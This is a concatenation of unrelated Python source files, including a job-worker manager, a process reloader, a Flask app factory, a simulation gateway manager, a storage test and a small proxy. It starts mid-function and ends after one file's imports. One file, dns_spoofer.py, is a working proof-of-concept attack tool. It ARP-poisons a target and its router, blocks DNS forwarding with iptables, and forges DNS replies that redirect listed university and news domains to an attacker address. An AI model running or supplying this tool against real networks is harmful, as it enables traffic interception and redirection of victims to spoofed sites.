jobs_all.append(job.id)
task = job.get_task() # also resets status
if job.worker_utm == worker_utm and task: # jobs with current timestamp are new ( odds of a ping matching this worker_utm? ), isolate evens and odds?
jobs_new.append(task)
return jobs_all, jobs_new
def worker_downscale():
name = get_instance_name()
if name != 'UNKNOWN':
group_instances_delete(name)
def make_non_blocking(file_io):
fd = file_io.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
class Workers():
def __init__(self, uid, jobs_maximum, timeout_seconds, trace=False):
self.uid = uid or get_instance_name()
self.timeout_seconds = timeout_seconds
self.trace = trace
self.jobs_maximum = jobs_maximum
self.jobs = []
self.lock_thread = threading.Lock()
self.ping_event = threading.Event()
self.ping_thread = threading.Thread(target=self.ping)
self.ping_thread.start()
self.busy_time = datetime.utcnow()
def available(self):
return self.jobs_maximum - len(self.jobs)
def pull(self):
self.lock_thread.acquire()
# get jobs for this worker ( threadsafe and takes a long time, so outside of thread lock )
jobs_all, jobs_new = worker_pull(self.uid, jobs=self.available())
# remove all lost jobs from ping
jobs_remove = []
last_job = len(self.jobs)
while last_job > 0:
last_job -= 1
if self.jobs[last_job]['recipe']['setup']['uuid'] not in jobs_all:
jobs_remove.append(self.jobs[last_job])
del self.jobs[last_job]
# add all new jobs to ping
self.jobs.extend(jobs_new)
# allow pings to resume with up to date list
self.lock_thread.release()
# shut down all removed jobs
try:
for job in jobs_remove:
if job.get('job', {}).get('process'): job['job']['process'].kill()
self.cleanup(job)
log_job_cancel(job)
except Exception as e:
log_manager_error(traceback.format_exc())
def run(self, job, force=False):
job['recipe']['setup'].setdefault('timeout_seconds', self.timeout_seconds)
job['job'] = {
'worker':self.uid,
'id':str(uuid.uuid1()),
'process':None,
'utc':datetime.utcnow(),
}
filename = '%s/%s.json' % (settings.UI_CRON, job['job']['id'])
with open(filename, 'w') as job_file:
job_file.write(json.dumps(job['recipe'], default=str))
command = [
'%s/starthinker_virtualenv/bin/python' % settings.UI_ROOT,
'-u', '-W', 'ignore',
'%s/starthinker/task/%s/run.py' % (settings.UI_ROOT, job['script']),
filename,
'-i', str(job['instance']),
'--verbose',
]
if self.trace: command.append('--trace_file')
job['job']['process'] = subprocess.Popen(command, shell=False, cwd=settings.UI_ROOT, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
make_non_blocking(job['job']['process'].stdout)
make_non_blocking(job['job']['process'].stderr)
def cleanup(self, job):
filename = '%s/%s.json' % (settings.UI_CRON, job['job']['id'])
if os.path.exists(filename):
os.remove(filename)
def ping(self):
global MANAGER_HEALTHY
while MANAGER_HEALTHY and not self.ping_event.wait(JOB_INTERVAL_MS / 1000):
self.lock_thread.acquire()
try:
worker_ping(self.uid, [job['recipe']['setup']['uuid'] for job in self.jobs])
except Exception as e:
log_manager_error(traceback.format_exc())
MANAGER_HEALTHY = False
self.lock_thread.release()
def poll(self):
for job in self.jobs:
# if job changes state, this is set, then sent to database
status = None
# start job if it is not already running
if 'job' not in job:
self.run(job)
log_job_start(job)
status = 'JOB_START'
stdout = None
stderr = None
# if already running check status
else:
# read any incremental data from the process ( made non-blocking at construction )
stdout = job['job']['process'].stdout.read()
if stdout is not None: stdout = stdout.decode()
stderr = job['job']['process'].stderr.read()
if stderr is not None: stderr = stderr.decode()
# if process still running, check timeout or ping keep alive
poll = job['job']['process'].poll()
if poll is None:
# check if task is a timeout
if (datetime.utcnow() - job['job']['utc']).total_seconds() > job['recipe']['setup']['timeout_seconds']:
status = 'JOB_TIMEOUT'
job['job']['process'].kill()
self.cleanup(job)
log_job_timeout(job)
job['job']['process'] = None
# otherwise task is running, update stdout and stderr if present
elif stdout or stderr:
status = 'JOB_START'
# if process has return code, check if task is complete or error
else:
self.cleanup(job)
# if error scrap whole worker and flag error
if poll != 0:
status = 'JOB_ERROR'
log_job_error(job)
job['job']['process'] = None
# if success, pop task off the stack and flag success
else:
status = 'JOB_END'
log_job_end(job)
job['job']['process'] = None
# if status is set, send it to the database
if status:
worker_status(
job['job']['worker'],
job['recipe']['setup']['uuid'],
job['script'],
job['instance'],
job['hour'],
status,
stdout,
stderr
)
# remove all workers without a process, they are done
if self.jobs:
self.lock_thread.acquire()
self.jobs = [job for job in self.jobs if job['job']['process'] is not None]
self.lock_thread.release()
# update the busy time if jobs exist
if len(self.jobs) != 0: self.busy_time = datetime.utcnow()
# if workers remain, return True
return bool(self.jobs)
def idle(self):
return (datetime.utcnow() - self.busy_time).seconds > IDLE_INTERVAL
def shutdown(self):
# wait for jobs to finish
while self.poll():
time.sleep(JOB_INTERVAL_MS / 1000)
# turn off threads ( ping )
self.ping_event.set()
class Command(BaseCommand):
help = 'Executes a recipe job and writes status to the databse.'
def add_arguments(self, parser):
parser.add_argument(
'--worker',
action='store',
dest='worker',
default='',
help='Name of worker to use when requesting jobs.',
)
parser.add_argument(
'--jobs',
action='store',
dest='jobs',
default=3,
type=int,
help='Maximum number of jobs simlutanelous processes to start within this worker.',
)
parser.add_argument(
'--timeout',
action='store',
dest='timeout',
default=60 * 60 * 12, # 12 hours
type=int,
help='Default seconds to allow a task to run before timing it out, also controlled by recipe.',
)
parser.add_argument(
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='Causes log messages to also print.',
)
parser.add_argument(
'--trace',
action='store_true',
dest='trace',
default=False,
help='Create an execution trace in /tmp/starthinker_trace.log.',
)
parser.add_argument(
'--test',
action='store_true',
dest='test',
default=False,
help='Set test mode to execute loop only once and return workers.',
)
def handle(self, *args, **kwargs):
global MANAGER_ON
global MANAGER_HEALTHY
MANAGER_ON = True
MANAGER_HEALTHY = True
if kwargs['test']: print('Starting Up...')
if kwargs['verbose']: log_verbose()
log_manager_start()
if kwargs['test']: print('Initializing Workers...')
workers = Workers(
kwargs['worker'],
kwargs['jobs'],
kwargs['timeout'],
kwargs['trace'],
)
try:
while MANAGER_HEALTHY and MANAGER_ON:
# load jobs
workers.pull()
time.sleep(JOB_INTERVAL_MS / 1000)
# evaluate jobs
workers.poll()
# check if worker needs to scale down
if workers.idle():
MANAGER_ON = False
log_manager_timeout()
else:
time.sleep(JOB_INTERVAL_MS / 1000)
if kwargs['test']:
MANAGER_ON = False
except KeyboardInterrupt:
MANAGER_ON = False
except Exception as e:
if kwargs['test']: print(str(e))
log_manager_error(traceback.format_exc())
if MANAGER_HEALTHY:
if kwargs['test']: print('Shutting Down...')
workers.shutdown()
log_manager_end()
# worker will terminate itself in a group safe way
worker_downscale()
|
reloader_helpers.py
|
import os
import sys
import signal
import subprocess
from time import sleep
from multiprocessing import Process
def _iter_module_files():
"""This iterates over all relevant Python files.
It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
filename = filename[:-1]
yield filename
def _get_args_for_reloading():
"""Returns the executable."""
rv = [sys.executable]
rv.extend(sys.argv)
return rv
def restart_with_reloader():
"""Create a new process and a subprocess in it with the same arguments as
this one.
"""
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ['SANIC_SERVER_RUNNING'] = 'true'
cmd = ' '.join(args)
worker_process = Process(
target=subprocess.call, args=(cmd,),
kwargs=dict(shell=True, env=new_environ))
worker_process.start()
return worker_process
def kill_process_children_unix(pid):
"""Find and kill child process of a process (maximum two level).
:param pid: PID of process (process ID)
:return: Nothing
"""
root_process_path = "/proc/{pid}/task/{pid}/children".format(pid=pid)
if not os.path.isfile(root_process_path):
return
with open(root_process_path) as children_list_file:
children_list_pid = children_list_file.read().split()
for child_pid in children_list_pid:
children_proc_path = "/proc/%s/task/%s/children" % \
(child_pid, child_pid)
if not os.path.isfile(children_proc_path):
continue
with open(children_proc_path) as children_list_file_2:
children_list_pid_2 = children_list_file_2.read().split()
for _pid in children_list_pid_2:
os.kill(int(_pid), signal.SIGTERM)
def kill_program_completly(proc):
"""Kill worker and it's child processes and exit.
:param proc: worker process (process ID)
:return: Nothing
"""
kill_process_children_unix(proc.pid)
proc.terminate()
os._exit(0)
def watchdog(sleep_interval):
"""Watch project files, restart worker process if a change happened.
:param sleep_interval: interval in second.
:return: Nothing
"""
mtimes = {}
worker_process = restart_with_reloader()
signal.signal(
signal.SIGTERM, lambda *args: kill_program_completly(worker_process))
signal.signal(
signal.SIGINT, lambda *args: kill_program_completly(worker_process))
while True:
for filename in _iter_module_files():
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
kill_process_children_unix(worker_process.pid)
worker_process = restart_with_reloader()
mtimes[filename] = mtime
break
sleep(sleep_interval)
|
app.py
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
import gevent.monkey
gevent.monkey.patch_all()
import logging
import sys
import os
import threading
from flask import Flask, render_template, current_app
from flask_restful import Api
from walle import commands
from walle.api import access as AccessAPI
from walle.api import api as BaseAPI
from walle.api import deploy as DeployAPI
from walle.api import environment as EnvironmentAPI
from walle.api import general as GeneralAPI
from walle.api import group as GroupAPI
from walle.api import passport as PassportAPI
from walle.api import project as ProjectAPI
from walle.api import repo as RepoApi
from walle.api import role as RoleAPI
from walle.api import server as ServerAPI
from walle.api import space as SpaceAPI
from walle.api import task as TaskAPI
from walle.api import user as UserAPI
from walle.config.settings_prod import ProdConfig
from walle.model.user import UserModel, AnonymousUser
from walle.service.code import Code
from walle.service.error import WalleError
from walle.service.extensions import bcrypt, csrf_protect, db, migrate
from walle.service.extensions import login_manager, mail, permission, socketio
from walle.service.websocket import WalleSocketIO
def create_app(config_object=ProdConfig):
"""An application factory, as explained here: http://flask.pocoo.org/docs/patterns/appfactories/.
:param config_object: The configuration object to use.
"""
app = Flask(__name__.split('.')[0])
app.config.from_object(config_object)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
register_shellcontext(app)
register_commands(app)
register_logging(app)
@app.before_request
def before_request():
# TODO
pass
@app.teardown_request
def shutdown_session(exception=None):
# TODO
from walle.model.database import db
db.session.remove()
@app.route('/api/websocket')
def index():
return render_template('socketio.html')
# 单元测试不用开启 websocket
if app.config.get('ENV') != 'test':
register_socketio(app)
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except NameError:
pass
return app
def register_extensions(app):
"""Register Flask extensions."""
bcrypt.init_app(app)
db.init_app(app)
csrf_protect.init_app(app)
login_manager.session_protection = 'strong'
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
current_app.logger.info(user_id)
return UserModel.query.get(user_id)
@login_manager.unauthorized_handler
def unauthorized():
# TODO log
return BaseAPI.ApiResource.json(code=Code.unlogin)
login_manager.init_app(app)
migrate.init_app(app, db)
mail.init_app(app)
permission.init_app(app)
return app
def register_blueprints(app):
"""Register Flask blueprints."""
api = Api(app)
api.add_resource(BaseAPI.Base, '/', endpoint='root')
api.add_resource(GeneralAPI.GeneralAPI, '/api/general/<string:action>', endpoint='general')
api.add_resource(SpaceAPI.SpaceAPI, '/api/space/', '/api/space/<int:space_id>', '/api/space/<int:space_id>/<string:action>', endpoint='space')
api.add_resource(DeployAPI.DeployAPI, '/api/deploy/', '/api/deploy/<int:task_id>', endpoint='deploy')
api.add_resource(AccessAPI.AccessAPI, '/api/access/', '/api/access/<int:access_id>', endpoint='access')
api.add_resource(RoleAPI.RoleAPI, '/api/role/', endpoint='role')
api.add_resource(GroupAPI.GroupAPI, '/api/group/', '/api/group/<int:group_id>', endpoint='group')
api.add_resource(PassportAPI.PassportAPI, '/api/passport/', '/api/passport/<string:action>', endpoint='passport')
api.add_resource(UserAPI.UserAPI, '/api/user/', '/api/user/<int:user_id>/<string:action>', '/api/user/<string:action>', '/api/user/<int:user_id>', endpoint='user')
api.add_resource(ServerAPI.ServerAPI, '/api/server/', '/api/server/<int:id>', endpoint='server')
api.add_resource(ProjectAPI.ProjectAPI, '/api/project/', '/api/project/<int:project_id>', '/api/project/<int:project_id>/<string:action>', endpoint='project')
api.add_resource(RepoApi.RepoAPI, '/api/repo/<string:action>/', endpoint='repo')
api.add_resource(TaskAPI.TaskAPI, '/api/task/', '/api/task/<int:task_id>', '/api/task/<int:task_id>/<string:action>', endpoint='task')
api.add_resource(EnvironmentAPI.EnvironmentAPI, '/api/environment/', '/api/environment/<int:env_id>', endpoint='environment')
return None
def register_errorhandlers(app):
"""Register error handlers."""
@app.errorhandler(WalleError)
def render_error(error):
# response 的 json 内容为自定义错误代码和错误信息
app.logger.error(error, exc_info=1)
return error.render_error()
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'db': db,
'User': UserModel,
}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.test)
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_logging(app):
# TODO https://blog.csdn.net/zwxiaoliu/article/details/80890136
# email errors to the administrators
import logging
from logging.handlers import RotatingFileHandler
# Formatter
formatter = logging.Formatter(
'%(asctime)s %(levelname)s %(pathname)s %(lineno)s %(module)s.%(funcName)s %(message)s')
# log dir
if not os.path.exists(app.config['LOG_PATH']):
os.makedirs(app.config['LOG_PATH'])
# FileHandler Info
file_handler_info = RotatingFileHandler(filename=app.config['LOG_PATH_INFO'])
file_handler_info.setFormatter(formatter)
file_handler_info.setLevel(logging.INFO)
info_filter = InfoFilter()
file_handler_info.addFilter(info_filter)
app.logger.addHandler(file_handler_info)
# FileHandler Error
file_handler_error = RotatingFileHandler(filename=app.config['LOG_PATH_ERROR'])
file_handler_error.setFormatter(formatter)
file_handler_error.setLevel(logging.ERROR)
app.logger.addHandler(file_handler_error)
def register_socketio(app):
if len(sys.argv) > 1 and sys.argv[1] == 'db':
return app
socketio.init_app(app, async_mode='gevent')
socketio.on_namespace(WalleSocketIO(namespace='/walle'))
socket_args = {"debug": app.config.get('DEBUG'), "host": app.config.get('HOST'), "port": app.config.get('PORT')}
socket_thread = threading.Thread(target=socketio.run, name="socket_thread", args=(app, ), kwargs=socket_args)
socket_thread.start()
return app
class InfoFilter(logging.Filter):
def filter(self, record):
"""only use INFO
筛选, 只需要 INFO 级别的log
:param record:
:return:
"""
if logging.INFO <= record.levelno < logging.ERROR:
# 已经是INFO级别了
# 然后利用父类, 返回 1
return 1
else:
return 0
|
dns_spoofer.py
|
#!/usr/bin/python
#------------------------------------------------------------------------------
# SOURCE: dns_spoofer.py
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Proof of concept DNS spoofer using python and scapy library.
#------------------------------------------------------------------------------
import signal
import uuid
import sys
import socket
import pcapy
import threading
import time
from uuid import getnode as get_mac
from scapy.all import *
from multiprocessing import *
from subprocess import Popen, PIPE
# 2d array to hold whitelisted sites and the IP address to redirect them to
sites = [["milliways.bcit.ca", "192.168.0.18"],
["bcit.ca", "192.168.0.18"],
["sfu.ca", "192.168.0.18"],
["ubc.ca", "192.168.0.18"],
["cbc.ca", "192.168.0.18"],
["sd43.bc.ca", "192.168.0.18"]]
#------------------------------------------------------------------------------
# FUNCTION: init_setup()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Drops firewall forwarding for UDP packets to port 53.
#------------------------------------------------------------------------------
def init_setup():
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
#------------------------------------------------------------------------------
# FUNCTION: get_my_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of this machine (attacker machine).
#------------------------------------------------------------------------------
def get_my_mac():
_mac_addr = hex(uuid.getnode()).replace('0x', '')
return str(':'.join(_mac_addr[i : i + 2] for i in range(0, 11, 2)))
#------------------------------------------------------------------------------
# FUNCTION: get_target_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of target machine. Makes use of two threads.
# One thread to send an ARP query to target machine. The other
# thread is used to read the query response from target machine
# as to extract the target machines MAC address.
#------------------------------------------------------------------------------
def get_target_mac():
_thread1 = threading.Thread(target=arp_request_target, args=(my_ip, my_mac, target_ip))
_thread2 = threading.Thread(target=read_target_response, args=())
_thread2.start()
time.sleep(0.5)
_thread1.start()
_thread1.join()
_thread2.join()
#------------------------------------------------------------------------------
# FUNCTION: get_router_mac()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Get MAC address of router. Makes use of two threads.
# One thread to send an ARP query to router. The other
# thread is used to read the query response from the router
# as to extract the routers MAC address.
#------------------------------------------------------------------------------
def get_router_mac():
_thread1 = threading.Thread(target=arp_request_router, args=(my_ip, my_mac, router_ip))
_thread2 = threading.Thread(target=read_router_response, args=())
_thread2.start()
time.sleep(0.5)
_thread1.start()
_thread1.join()
_thread2.join()
#------------------------------------------------------------------------------
# FUNCTION: arp_request_target(my_ip, my_mac, target_ip)
# my_ip : ip of attacker machine
# my_mac : MAC address of attacker machine
# target_ip : ip of target machine
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Send ARP request to get MAC address of target IP.
#------------------------------------------------------------------------------
def arp_request_target(my_ip, my_mac, target_ip):
send(ARP(op=1, hwsrc=my_mac, psrc=my_ip, pdst=target_ip), verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_request_target(my_ip, my_mac, router_ip)
# my_ip : ip of attacker machine
# my_mac : MAC address of attacker machine
# router_ip : ip of router
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Send ARP request to get MAC address of router IP.
#------------------------------------------------------------------------------
def arp_request_router(my_ip, my_mac, router_ip):
send(ARP(op=1, hwsrc=my_mac, psrc=my_ip, pdst=router_ip), verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: read_target_response()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Read ARP response of target to get target MAC address.
#------------------------------------------------------------------------------
def read_target_response():
pkt = sniff(filter='arp', count=2) # sniff dns response
sys.stdout.write("Target ARP Response: " + target_ip + " -> " + pkt[1].hwsrc + '\n')
global target_mac
target_mac = str(pkt[1].hwsrc)
#------------------------------------------------------------------------------
# FUNCTION: read_router_response()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Read ARP response of router to get target MAC address.
#------------------------------------------------------------------------------
def read_router_response():
pkt = sniff(filter='arp', count=2) # sniff dns response
sys.stdout.write("Router ARP Response: " + router_ip + " -> " + pkt[1].hwsrc + '\n')
global router_mac
router_mac = str(pkt[1].hwsrc)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison_target()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: ARP poison the targets ARP cache by sending fake ARP response.
#------------------------------------------------------------------------------
def arp_poison_target():
target_arp_poison = Ether(src=my_mac, dst=target_mac)/ARP(hwsrc=my_mac, hwdst=target_mac, psrc=router_ip, pdst=target_ip, op=2)
sendp(target_arp_poison, verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison_router()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: ARP poison the routers ARP cache by sending fake ARP response.
#------------------------------------------------------------------------------
def arp_poison_router():
router_arp_poison = Ether(src=my_mac, dst=router_mac)/ARP(hwsrc=my_mac, hwdst=router_mac, psrc=target_ip, pdst=router_ip, op=2)
sendp(router_arp_poison, verbose=0)
#------------------------------------------------------------------------------
# FUNCTION: arp_poison()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: High level function to ARP poison target and router.
#------------------------------------------------------------------------------
def arp_poison():
i = 0
while i < 10:
arp_poison_target()
arp_poison_router()
time.sleep(2)
#------------------------------------------------------------------------------
# FUNCTION: print_info()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Print network info.
#------------------------------------------------------------------------------
def print_info():
sys.stdout.write("\nAttacker: " + my_ip + " -> " + my_mac + '\n')
sys.stdout.write("Target : " + target_ip + " -> " + target_mac + '\n')
sys.stdout.write("Router : " + router_ip + " -> " + router_mac + '\n\n')
#------------------------------------------------------------------------------
# FUNCTION: read_dns()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Sniff DNS query packets from target machine.
#------------------------------------------------------------------------------
def read_dns():
sniff_filter = "udp and port 53 and src " + str(target_ip)
sniff(filter=sniff_filter, prn=redirect)
#------------------------------------------------------------------------------
# FUNCTION: redirect(packet)
# packet : the sniffed DNS packet from target
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Check if site from DNS query macthes a whitelisted site.
#------------------------------------------------------------------------------
def redirect(packet):
for x in range(len(sites)):
if sites[x][0] in packet.getlayer(DNS).qd.qname:
spoof_packet(packet, sites[x][1])
print(str(packet.getlayer(DNS).qd.qname + " -> " + sites[x][1]))
#------------------------------------------------------------------------------
# FUNCTION: spoof_packet(packet, ip)
# packet : the sniffed DNS packet from target
# ip : ip to put in crafted DNS response as to redirect target
# AUTHOR: Alex Zielinski
#
# DATE: November 5, 2018
#
# DESC: Check if site from DNS query macthes a whitelisted site.
#------------------------------------------------------------------------------
def spoof_packet(packet, ip):
ans = DNSRR(rrname=packet[DNS].qd.qname, ttl=200, rdata=ip)
dns = DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=ans)
response = IP(dst=target_ip, src=packet[IP].dst) / UDP(dport=packet[UDP].sport, sport=packet[UDP].dport) /dns
send(response, verbose=0)
#------------------------------------------------------------------------------
# FUNTION: main()
#
# AUTHOR: Alex Zielinski
#
# DATE: November 5 2018
#
# DESC: Main entry piont of program
#------------------------------------------------------------------------------
if __name__ == "__main__":
# Validate CMD ARGS
if len(sys.argv) != 4:
print("\nError: invalid arguments")
print("Usage: ./dns_spoof.py <ATTACKER IP> <TARGET IP> <ROUTER IP>\n")
exit()
# Extract CMD ARGS
my_ip = sys.argv[1]
target_ip = sys.argv[2]
router_ip = sys.argv[3]
my_mac = get_my_mac()
# Drop firewall forwarding
init_setup()
# Get MAC addr from target and router
get_target_mac()
get_router_mac()
# Print networking info (who has what IP and MAC addr)
print_info()
# Start ARP poisoning and DNS spoofing
arp_poison_proc = Process(target=arp_poison, args=())
dns_thread = Process(target=read_dns, args=())
arp_poison_proc.start()
dns_thread.start()
arp_poison_proc.join()
dns_thread.join()
|
villas_node.py
|
import threading
from villas.node.node import Node
from villas.controller.components.manager import Manager
from villas.controller.components.gateways.villas_node import VILLASnodeGateway
class VILLASnodeManager(Manager):
def __init__(self, **args):
self.autostart = args.get('autostart', False)
self.api_url = args.get('api_url', 'http://localhost:8080')
self.api_url_external = args.get('api_url_external', self.api_url)
args['api_url'] = self.api_url
self.thread_stop = threading.Event()
self.thread = threading.Thread(target=self.reconcile_periodically)
self.node = Node(**args)
self._status = self.node.status
args['uuid'] = self._status.get('uuid')
super().__init__(**args)
def reconcile_periodically(self):
while not self.thread_stop.wait(2):
self.reconcile()
def reconcile(self):
try:
self._status = self.node.status
self._nodes = self.node.nodes
for node in self._nodes:
self.logger.debug('Found node %s on gateway: %s',
node['name'], node)
if node['uuid'] in self.components:
ic = self.components[node['uuid']]
# Update state
ic.change_state(node['state'])
else:
ic = VILLASnodeGateway(self, node)
self.add_component(ic)
self.change_state('running')
except Exception as e:
self.change_to_error('failed to reconcile',
exception=str(e),
args=e.args)
@property
def status(self):
status = super().status
status['status']['villas_node_version'] = self._status.get('version')
return status
def on_ready(self):
if self.autostart and not self.node.is_running():
self.start()
self.thread.start()
super().on_ready()
def on_shutdown(self):
self.thread_stop.set()
self.thread.join()
return super().on_shutdown()
def start(self, payload):
self.node.start()
self.change_state('starting')
def stop(self, payload):
if self.node.is_running():
self.node.stop()
self.change_state('idle')
# Once the gateway shutsdown, all the gateway nodes are also shutdown
for node in self.nodes:
node.change_state('shutdown')
def pause(self, payload):
self.node.pause()
self.change_state('paused')
# Once the gateway shutsdown, all the gateway nodes are also shutdown
for node in self.nodes:
node.change_state('paused')
def resume(self, payload):
self.node.resume()
def reset(self, payload):
self.node.restart()
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2019 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import ctypes
import os
import traceback
from multiprocessing import sharedctypes
from avocado import fail_on
from apricot import TestWithServers
import check_for_pool
from pydaos.raw import DaosContext, DaosPool, DaosContainer, DaosApiError, IOV
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share container
handles amoung processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
@fail_on(DaosApiError)
def check_handle(self, pool_glob_handle, uuidstr, cont_glob_handle, rank):
"""
This gets run in a child process and verifyes the global
handles can be turned into local handles in another process.
"""
# setup the pool and connect using global handle
pool = DaosPool(self.context)
pool.uuid = uuidstr
pool.set_svc(rank)
pool.group = "daos_server"
buf = ctypes.cast(pool_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
pool_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
pool_handle = pool.global2local(self.context,
pool_glob_handle.iov_len,
pool_glob_handle.iov_buf_len,
buf2)
# perform an operation that will use the new handle, if it
# doesn't throw an exception, then all is well.
pool.pool_query()
# setup the container and then connect using the global handle
container = DaosContainer(self.context)
container.poh = pool_handle
buf = ctypes.cast(cont_glob_handle.iov_buf,
ctypes.POINTER(ctypes.c_byte *
cont_glob_handle.iov_buf_len))
buf2 = bytearray()
buf2.extend(buf.contents)
dummy_cont_handle = container.global2local(self.context,
cont_glob_handle.iov_len,
cont_glob_handle.iov_buf_len,
buf2)
# just try one thing to make sure handle is good
container.query()
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=all,container,tiny,pr,conthandle
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode", '/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size", '/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
self.pool = DaosPool(self.context)
self.pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
self.pool.connect(1 << 1)
# create a pool global handle
iov_len, buf_len, buf = self.pool.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_pool_handle = (
sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len, iov_len))
# create a container
self.container = DaosContainer(self.context)
self.container.create(self.pool.handle)
self.container.open()
# create a container global handle
iov_len, buf_len, buf = self.container.local2global()
buftype = ctypes.c_byte * buf_len
c_buf = buftype.from_buffer(buf)
sct_cont_handle = (
sharedctypes.RawValue(IOV,
ctypes.cast(c_buf, ctypes.c_void_p),
buf_len, iov_len))
sct_pool_uuid = sharedctypes.RawArray(ctypes.c_byte, self.pool.uuid)
# this should work in the future but need on-line server addition
#arg_list = (
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
self.check_handle(sct_pool_handle, sct_pool_uuid,
sct_cont_handle, 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
multi_proxy_server.py
|
#!/usr/bin/env python3
import socket
import time, sys
from multiprocessing import Process
#define address & buffer size
# connect to proxy start
HOST = "localhost"
PORT = 8001
BUFFER_SIZE = 1024
def main():
extern_host = 'www.google.com'
extern_port = 80
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_start:
print('Starting proxy server')
proxy_start.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#bind socket to address
proxy_start.bind((HOST, PORT))
#set to listening mode
proxy_start.listen(2)
#continuously listen for connections
while True:
conn, addr = proxy_start.accept()
print("Connected by", addr)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_end:
print('Connecting to Google')
remote_ip = get_remote_ip(extern_host)
proxy_end.connect((remote_ip, extern_port))
p = Process(target=handle_request, args=(addr, conn))
p.daemon = True
p.start()
print('Started process', p)
conn.close()
def get_remote_ip(host):
print(f'Getting IP for {host}')
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
print ('Hostname could not be resolved. Exiting')
sys.exit()
print (f'Ip address of {host} is {remote_ip}')
return remote_ip
def handle_request(addr, conn):
print("Connected by", addr)
full_data = conn.recv(BUFFER_SIZE)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
if __name__ == "__main__":
main()
|
test_multiprocessing.py
|
import asyncio
import copy
import os
import sys
import multiprocessing
import threading
import time
import pytest
import loguru
import platform
from loguru import logger
